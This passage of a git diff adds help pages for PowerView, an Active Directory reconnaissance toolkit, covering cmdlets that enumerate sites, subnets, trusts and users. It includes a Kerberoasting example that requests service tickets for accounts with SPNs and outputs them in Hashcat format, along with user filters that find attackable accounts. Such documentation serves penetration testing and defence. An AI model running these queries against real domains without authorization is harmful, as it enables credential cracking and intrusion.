+```
+Get-DomainSPNTicket -SPN "HTTP/web.testlab.local"
+```
+
+Request a kerberos service ticket for the specified SPN.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+"HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-DomainSPNTicket
+```
+
+Request kerberos service tickets for all SPNs passed on the pipeline.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
+```
+
+Request kerberos service tickets for all users with non-null SPNs and output in Hashcat format.
+
+## PARAMETERS
+
+### -SPN
+Specifies the service principal name to request the ticket for.
+
+```yaml
+Type: String[]
+Parameter Sets: RawSPN
+Aliases: ServicePrincipalName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -User
+Specifies a PowerView.User object (result of Get-DomainUser) to request the ticket for.
+
+```yaml
+Type: Object[]
+Parameter Sets: User
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -OutputFormat
+Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
+Defaults to 'John'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Format
+
+Required: False
+Position: Named
+Default value: John
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote domain using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more SPN strings on the pipeline with the RawSPN parameter set.
+
+### PowerView.User
+
+Accepts one or more PowerView.User objects on the pipeline with the User parameter set.
+
+## OUTPUTS
+
+### PowerView.SPNTicket
+
+Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainSite.md b/docs/Recon/Get-DomainSite.md
new file mode 100755
index 0000000..caf7790
--- /dev/null
+++ b/docs/Recon/Get-DomainSite.md
@@ -0,0 +1,309 @@
+# Get-DomainSite
+
+## SYNOPSIS
+Search for all sites or specific site objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainSite [[-Identity] <String[]>] [-GPLink <String>] [-Domain <String>] [-LDAPFilter <String>]
+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
+ [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties whencreated,usnchanged,...".
+By default, all site objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainSite
+```
+
+Returns the current sites in the domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainSite *admin* -Domain testlab.local
+```
+
+Returns all sites with "admin" in their name in the testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainSite -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
+```
+
+Returns all sites with linked to the specified group policy object.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainSite -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+An site name (e.g.
+Test-Site), DistinguishedName (e.g.
+CN=Test-Site,CN=Sites,CN=Configuration,DC=testlab,DC=local), or
+GUID (e.g.
+c37726ef-2b64-4524-b85b-6a9700c234dd).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -GPLink
+Only return sites with the specified GUID in their gplink property.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: GUID
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.Site
+
+Custom PSObject with translated site property fields.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainSubnet.md b/docs/Recon/Get-DomainSubnet.md
new file mode 100755
index 0000000..8cd82b1
--- /dev/null
+++ b/docs/Recon/Get-DomainSubnet.md
@@ -0,0 +1,309 @@
+# Get-DomainSubnet
+
+## SYNOPSIS
+Search for all subnets or specific subnets objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainSubnet [[-Identity] <String[]>] [-SiteName <String>] [-Domain <String>] [-LDAPFilter <String>]
+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
+ [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties whencreated,usnchanged,...".
+By default, all subnet objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainSubnet
+```
+
+Returns the current subnets in the domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainSubnet *admin* -Domain testlab.local
+```
+
+Returns all subnets with "admin" in their name in the testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainSubnet -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
+```
+
+Returns all subnets with linked to the specified group policy object.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainSubnet -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+An subnet name (e.g.
+'192.168.50.0/24'), DistinguishedName (e.g.
+'CN=192.168.50.0/24,CN=Subnets,CN=Sites,CN=Configuratioiguration,DC=testlab,DC=local'),
+or GUID (e.g.
+c37726ef-2b64-4524-b85b-6a9700c234dd).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -SiteName
+Only return subnets from the specified SiteName.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.Subnet
+
+Custom PSObject with translated subnet property fields.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainTrust.md b/docs/Recon/Get-DomainTrust.md
new file mode 100755
index 0000000..29af577
--- /dev/null
+++ b/docs/Recon/Get-DomainTrust.md
@@ -0,0 +1,250 @@
+# Get-DomainTrust
+
+## SYNOPSIS
+{{Fill in the Synopsis}}
+
+## SYNTAX
+
+### NET (Default)
+```
+Get-DomainTrust [[-Domain] <String>] [-FindOne]
+```
+
+### API
+```
+Get-DomainTrust [[-Domain] <String>] [-API] [-Server <String>] [-FindOne]
+```
+
+### LDAP
+```
+Get-DomainTrust [[-Domain] <String>] [-LDAP] [-LDAPFilter <String>] [-Properties <String[]>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-FindOne] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+{{Fill in the Description}}
+
+## EXAMPLES
+
+### Example 1
+```
+PS C:\> {{ Add example code here }}
+```
+
+{{ Add example description here }}
+
+## PARAMETERS
+
+### -API
+{{Fill API Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: API
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+{{Fill Credential Description}}
+
+```yaml
+Type: PSCredential
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+{{Fill Domain Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 0
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -FindOne
+{{Fill FindOne Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAP
+{{Fill LDAP Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+{{Fill LDAPFilter Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+{{Fill Properties Description}}
+
+```yaml
+Type: String[]
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+{{Fill ResultPageSize Description}}
+
+```yaml
+Type: Int32
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+{{Fill SearchBase Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+{{Fill SearchScope Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases:
+Accepted values: Base, OneLevel, Subtree
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+{{Fill Server Description}}
+
+```yaml
+Type: String
+Parameter Sets: API, LDAP
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+{{Fill ServerTimeLimit Description}}
+
+```yaml
+Type: Int32
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+{{Fill Tombstone Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### System.String
+
+
+## OUTPUTS
+
+### PowerView.DomainTrust.NET
+PowerView.DomainTrust.LDAP
+PowerView.DomainTrust.API
+
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainTrustMapping.md b/docs/Recon/Get-DomainTrustMapping.md
new file mode 100755
index 0000000..692f265
--- /dev/null
+++ b/docs/Recon/Get-DomainTrustMapping.md
@@ -0,0 +1,220 @@
+# Get-DomainTrustMapping
+
+## SYNOPSIS
+{{Fill in the Synopsis}}
+
+## SYNTAX
+
+### NET (Default)
+```
+Get-DomainTrustMapping
+```
+
+### API
+```
+Get-DomainTrustMapping [-API] [-Server <String>]
+```
+
+### LDAP
+```
+Get-DomainTrustMapping [-LDAP] [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>]
+ [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
+ [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+{{Fill in the Description}}
+
+## EXAMPLES
+
+### Example 1
+```
+PS C:\> {{ Add example code here }}
+```
+
+{{ Add example description here }}
+
+## PARAMETERS
+
+### -API
+{{Fill API Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: API
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+{{Fill Credential Description}}
+
+```yaml
+Type: PSCredential
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAP
+{{Fill LDAP Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+{{Fill LDAPFilter Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+{{Fill Properties Description}}
+
+```yaml
+Type: String[]
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+{{Fill ResultPageSize Description}}
+
+```yaml
+Type: Int32
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+{{Fill SearchBase Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+{{Fill SearchScope Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases:
+Accepted values: Base, OneLevel, Subtree
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+{{Fill Server Description}}
+
+```yaml
+Type: String
+Parameter Sets: API, LDAP
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+{{Fill ServerTimeLimit Description}}
+
+```yaml
+Type: Int32
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+{{Fill Tombstone Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### None
+
+
+## OUTPUTS
+
+### PowerView.DomainTrust.NET
+PowerView.DomainTrust.LDAP
+PowerView.DomainTrust.API
+
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainUser.md b/docs/Recon/Get-DomainUser.md
new file mode 100755
index 0000000..7247a1d
--- /dev/null
+++ b/docs/Recon/Get-DomainUser.md
@@ -0,0 +1,426 @@
+# Get-DomainUser
+
+## SYNOPSIS
+Return all users or specific user objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-ADName, Convert-LDAPProperty
+
+## SYNTAX
+
+### AllowDelegation (Default)
+```
+Get-DomainUser [[-Identity] <String[]>] [-SPN] [-AdminCount] [-AllowDelegation] [-KerberosPreuthNotRequired]
+ [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]
+ [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]
+```
+
+### DisallowDelegation
+```
+Get-DomainUser [[-Identity] <String[]>] [-SPN] [-AdminCount] [-DisallowDelegation] [-KerberosPreuthNotRequired]
+ [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]
+ [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties samaccountname,usnchanged,...".
+By default, all user objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainUser -Domain testlab.local
+```
+
+Return all users for the testlab.local domain
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainUser "S-1-5-21-890171859-3433809279-3366196753-1108","administrator"
+```
+
+Return the user with the given SID, as well as Administrator.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff
+```
+
+lastlogoff samaccountname
+---------- --------------
+12/31/1600 4:00:00 PM dfm.a
+12/31/1600 4:00:00 PM dfm
+12/31/1600 4:00:00 PM harmj0y
+12/31/1600 4:00:00 PM Administrator
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-DomainUser -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -AdminCount -AllowDelegation
+```
+
+Search the specified OU for privileged user (AdminCount = 1) that allow delegation
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+Get-DomainUser -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon
+```
+
+Search for users with a primary group ID other than 513 ('domain users') and only return samaccountname and lastlogon
+
+### -------------------------- EXAMPLE 6 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainUser -Credential $Cred
+
+### -------------------------- EXAMPLE 7 --------------------------
+```
+Get-Domain | Select-Object -Expand name
+```
+
+testlab.local
+
+Get-DomainUser dev\user1 -Verbose -Properties distinguishedname
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainUser\] filter string: (&(samAccountType=805306368)(|(samAccountName=user1)))
+
+distinguishedname
+-----------------
+CN=user1,CN=Users,DC=dev,DC=testlab,DC=local
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+Also accepts DOMAIN\user format.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -SPN
+Switch.
+Only return user objects with non-null service principal names.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AdminCount
+Switch.
+Return users with '(adminCount=1)' (meaning are/were privileged).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AllowDelegation
+Switch.
+Return user accounts that are not marked as 'sensitive and not allowed for delegation'
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: AllowDelegation
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -DisallowDelegation
+Switch.
+Return user accounts that are marked as 'sensitive and not allowed for delegation'
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: DisallowDelegation
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -KerberosPreuthNotRequired
+Switch.
+Return user accounts with "Do not require Kerberos preauthentication" set.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
